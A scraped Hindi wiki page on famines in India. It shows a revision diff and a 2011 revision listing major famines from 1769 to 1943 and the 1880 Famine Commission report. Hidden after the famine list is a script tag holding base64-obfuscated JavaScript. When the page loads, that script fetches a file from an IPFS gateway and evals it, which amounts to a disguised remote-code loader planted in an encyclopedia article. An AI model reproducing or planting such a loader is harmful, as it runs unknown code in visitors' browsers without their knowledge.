Difference between revisions of "अकाल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('अकाल भारत के आर्थिक जीवन की एक दुखद विशेषता था। [[मे...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
अकाल [[भारत]] के आर्थिक जीवन की एक दुखद विशेषता था। [[मेगस्थनीज़]] ने लिखा है कि भारत में अकाल नहीं पड़ता, लेकिन यह कथन बाद के [[इतिहास]] में सही नहीं सिद्ध होता। सच तो यह है कि भारत जैसे देश में मुख्यत: [[कृषि|खेती]] ही जीवन-यापन का साधन है और वह मुख्यत: अनिश्चित मानसूनी वर्षा पर निर्भर रहती है। अत: यहाँ अकाल प्राय: पड़ता रहता है।  
 
अकाल [[भारत]] के आर्थिक जीवन की एक दुखद विशेषता था। [[मेगस्थनीज़]] ने लिखा है कि भारत में अकाल नहीं पड़ता, लेकिन यह कथन बाद के [[इतिहास]] में सही नहीं सिद्ध होता। सच तो यह है कि भारत जैसे देश में मुख्यत: [[कृषि|खेती]] ही जीवन-यापन का साधन है और वह मुख्यत: अनिश्चित मानसूनी वर्षा पर निर्भर रहती है। अत: यहाँ अकाल प्राय: पड़ता रहता है।  
====विश्वस्त विवरण====
+
====<u>विश्वस्त विवरण</u>====
 
[[ब्रिटिश साम्राज्य|ब्रिटिश राज्यकाल]] के पहले के अकालों का विश्वस्त विवरण प्राप्त नहीं होता है लेकिन 1757 ई. की [[प्लासी युद्ध|प्लासी की लड़ाई]] और [[1947]] ई. में भारत की स्वाधीनता मिलने के समय के बीच, अर्थात 190 वर्ष की छोटी अवधि के दौरान देश में बड़े-बड़े नौ अकाल पड़े। यथा-
 
[[ब्रिटिश साम्राज्य|ब्रिटिश राज्यकाल]] के पहले के अकालों का विश्वस्त विवरण प्राप्त नहीं होता है लेकिन 1757 ई. की [[प्लासी युद्ध|प्लासी की लड़ाई]] और [[1947]] ई. में भारत की स्वाधीनता मिलने के समय के बीच, अर्थात 190 वर्ष की छोटी अवधि के दौरान देश में बड़े-बड़े नौ अकाल पड़े। यथा-
 
*1769-70 ई., जिसमें [[अखण्डित बंगाल|बंगाल]], [[बिहार]] और [[उड़ीसा]] की एक तिहाई आबादी नष्ट हो गई।  
 
*1769-70 ई., जिसमें [[अखण्डित बंगाल|बंगाल]], [[बिहार]] और [[उड़ीसा]] की एक तिहाई आबादी नष्ट हो गई।  
Line 11: Line 11:
 
*1896-[[1900]] ई. में दक्षिणी, मध्य और उत्तरी भारत में अकाल पड़ा, जिसमें साढ़े सात लाख व्यक्ति मारे गए।
 
*1896-[[1900]] ई. में दक्षिणी, मध्य और उत्तरी भारत में अकाल पड़ा, जिसमें साढ़े सात लाख व्यक्ति मारे गए।
 
*[[1943]] ई. में ब्रिटिश सरकार की 'सर्वक्षार' नीति, व्यापारियों की धनलिप्सात्मक जमाख़ोरी तथा प्रशासनिक भ्रष्टाचार के कारण बंगाल में अकाल पड़ा, जिसमें 15 लाख व्यक्ति मरे।
 
*[[1943]] ई. में ब्रिटिश सरकार की 'सर्वक्षार' नीति, व्यापारियों की धनलिप्सात्मक जमाख़ोरी तथा प्रशासनिक भ्रष्टाचार के कारण बंगाल में अकाल पड़ा, जिसमें 15 लाख व्यक्ति मरे।
 
+
*सर रिचर्ड स्ट्रैची की अध्यक्षता में नियुक्त [[अकाल आयोग]] द्वारा 1880 ई. में [[अकाल प्रतिवेदन]] प्रस्तुत किया गया।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 21: Line 21:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 09:49, 4 March 2011

akal bharat ke arthik jivan ki ek dukhad visheshata tha. megasthaniz ne likha hai ki bharat mean akal nahian p data, lekin yah kathan bad ke itihas mean sahi nahian siddh hota. sach to yah hai ki bharat jaise desh mean mukhyat: kheti hi jivan-yapan ka sadhan hai aur vah mukhyat: anishchit manasooni varsha par nirbhar rahati hai. at: yahaan akal pray: p data rahata hai.

vishvast vivaran

british rajyakal ke pahale ke akaloan ka vishvast vivaran prapt nahian hota hai lekin 1757 ee. ki plasi ki l daee aur 1947 ee. mean bharat ki svadhinata milane ke samay ke bich, arthat 190 varsh ki chhoti avadhi ke dauran desh mean b de-b de nau akal p de. yatha-

  • 1769-70 ee., jisamean bangal, bihar aur u disa ki ek tihaee abadi nasht ho gee.
  • 1837-38 ee. mean samast uttari bharat akalagrast hua, jisamean 8 lakh vyakti maut ke shikar hue.
  • 1861 ee. mean pun: bhari akal p da, jisamean uttar bharat mean asankhy vyakti mare.
  • 1866 ee. mean u disa mean akal p da, jisamean 10 lakh logoan ki janean geean.
  • 1868-1869 ee. mean rajapootana aur buandelakhand akal ke shikar hue. isamean kam adami mare, phir bhi yah sankhya ek lakh se kam nahian thi.
  • 1873-74 ee. mean bangal aur bihar mean pun: akal p da, jisamean log bhari sankhya mean mare.
  • 1876-78 ee. ka akal to samast bharat mean p da, jisake phalasvaroop akele british bharat mean 50 lakh vyakti mare.
  • 1896-1900 ee. mean dakshini, madhy aur uttari bharat mean akal p da, jisamean sadhe sat lakh vyakti mare ge.
  • 1943 ee. mean british sarakar ki 'sarvakshar' niti, vyapariyoan ki dhanalipsatmak jamakhori tatha prashasanik bhrashtachar ke karan bangal mean akal p da, jisamean 15 lakh vyakti mare.
  • sar richard straichi ki adhyakshata mean niyukt akal ayog dvara 1880 ee. mean akal prativedan prastut kiya gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh